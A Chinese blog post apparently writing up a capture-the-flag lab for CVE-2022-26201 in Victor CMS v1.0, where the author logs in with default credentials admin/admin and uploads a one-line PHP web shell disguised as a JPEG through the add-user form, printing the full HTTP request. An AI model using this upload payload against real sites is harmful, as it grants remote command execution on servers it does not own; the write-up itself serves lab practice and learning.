春秋云境:CVE-2022-26201

已于 2024-03-08 13:00:28 修改
阅读量1.1k 收藏 2
点赞数 2
分类专栏: 春秋云境-靶场 文章标签: 安全 web安全 网络安全 系统安全 安全漏洞
于 2022-11-30 10:18:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/128110193
版权

春秋云境:CVE-2022-26201

文章合集春秋云境系列靶场记录(合集)

关注WX:【小白SEC】查看更多内容……

Victor CMS v1.0 存在二次注入漏洞

在这里插入图片描述

漏洞介绍

Victor CMS v1.0 存在二次注入漏洞

解题步骤

题外话

此处发现应该有多个漏洞,题目中是要求通过二次注入,但是我没找到二次注入点,前文写过可以通过登录口的sql注入:春秋云境:CVE-2022-28060,登录后台后应该也有sql注入,但是这里我通过文件上传拿到flag,惭愧,进入正题

  1. 访问url,通过弱口令:admin/admin进入后台
    在这里插入图片描述

  2. 在新增用户处新增用户:
    在这里插入图片描述

  3. 抓包,修改图片内容与文件名:

POST /admin/users.php?source=add_user HTTP/1.1
Host: eci-2zc6z7gh1dt8e6gleuwb.cloudeci1.ichunqiu.com
Content-Length: 1752
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2t6bzezc716gw8delugh.cloudeci1.ichunqiu.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7s8yO4CHxTiBV5R9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2t6bzezc716gw8delugh.cloudeci1.ichunqiu.com/admin/users.php?source=add_user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669346763,1669632114,1669640024,1669723832; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669726366; PHPSESSID=f495skuq4ob5qastg7igbcb442
Connection: close

------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_name"

test
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_firstname"

test
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_lastname"

test
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_image"; filename="testshell.php"
Content-Type: image/jpeg

<?php system($_GET[1]); phpinfo();?>
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_role"

Admin
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_email"

test@qq.com
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_password"

test
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="create_user"

Add User
------WebKitFormBoundary7s8yO4CHxTiBV5R9--

在这里插入图片描述

  1. 返回查看图片url,并执行命令获取flag:
    在这里插入图片描述

文章合集春秋云境系列靶场记录(合集)

Acczdy
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Victor CMS SQL注入漏洞( CVE-2022-26201
千寻的博客
12-01 1848
Victor CMS v1.0 存在二次注入漏洞
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-26201-春秋云境.com-Victor CMS v1.0 存在二次注入漏洞
qq_42036164的博客
01-19 224
靶标介绍: Victor CMS v1.0 存在二次注入漏洞
CVE-2022-26201靶场WP
果粒程
11-29 901
CVE-2022-26201靶场WP
春秋云境CVE-2023-50563
2303_76653367的博客
05-16 542
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入。
春秋云镜】CVE-2022-26201 Victor CMS v1.0 存在二次注入漏洞 解题思路
Dark-Specter的博客
12-16 1210
二次注入漏洞(Second-Order Injection Vulnerability)是一种安全漏洞,通常出现在Web应用程序中。它是基于用户输入的攻击,类似于常见的SQL注入漏洞,但与之不同的是,二次注入漏洞不是直接在用户提供的输入上发生,而是在稍后的某个阶段或请求中。:二次注入漏洞的原理在于,Web应用程序在某个阶段(通常是数据存储或处理阶段)没有充分地验证、过滤或转义用户输入,然后将该输入存储到数据库、文件或其他存储设备中。
Victor CMS 二次注入漏洞(CVE-2022-26201
weixin_68999845的博客
08-17 849
1.下载源码到本地:https://codeload.github.com/VictorAlagwu/CMSsite/zip/refs/heads/master。源码下载url:https://codeload.github.com/VictorAlagwu/CMSsite/zip/refs/heads/master。语句接收$cat_title并未过滤,单引号、右括号闭合,即可插入sql注入语句,运用insert语句完成二次注入。·漏洞名称:Victor CMS 二次注入漏洞。目前最高版本:v1.0。
CVE-2022-26201
龙狼刺的博客
06-18 200
Victor CMS v1.0 存在二次注入漏洞。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
春秋云境CVE-2022-26201(二次注入漏洞)
m0_65712192的博客
04-21 1271
Victor CMS v1.0 存在二次注入漏洞
春秋云镜 CVE-2022-26201
qq_22002773的博客
07-23 227
春秋云镜 CVE-2022-26201
春秋云镜 CVE-2022-26201/ CVE-2021-25203
qq_22002773的博客
07-22 241
春秋云镜 CVE-2022-26201/ CVE-2021-25203
春秋云境】文件上传漏洞合集
qq_45755193的博客
04-25 965
使用工具:burpsuite使用工具:brupsuite进入/admin/do目录,弱口令为admin/admin888谷歌翻译一下:在这里新增php文件类型php//该密钥为连接密码32位md5值的前16位,默认连接密码rebeyondif(!for($i=0;登录/admin,弱口令admin/123登录文件管理,编辑任意php文件为木马,冰蝎连接得到flag:不登录,直接选择Admin。
[春秋云镜] CVE-2022-28060 详细讲解
weixin_60374959的博客
11-28 2834
Victor CMS v1.0 /includes/login.php 存在sql注入。
Victor CMS v1.0 SQL 注入漏洞(CVE-2022-26201
最新发布
Flag少侠的博客
07-05 9381
打开靶场点击链接访问SQL 注入嘛,就看传参测试呗,点击下面的一个 Read More可以看到有 POST 传参使用 SQLMap 测试看是否可注入post=4"_____H__n[Y/n] n[Y/n] n[y/N] n------可注入,接下来就是爆库_____H__------[*] mysql[*] sys在 mysql 数据库中查找有关 flag 的文件_____H__------[Y/n] n使用 cat 查看给出的文件地址。
春秋云境CVE-2022-28060
一只爱吃橙子的羊
11-29 2467
Victor CMS v1.0 /includes/login.php 存在sql注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值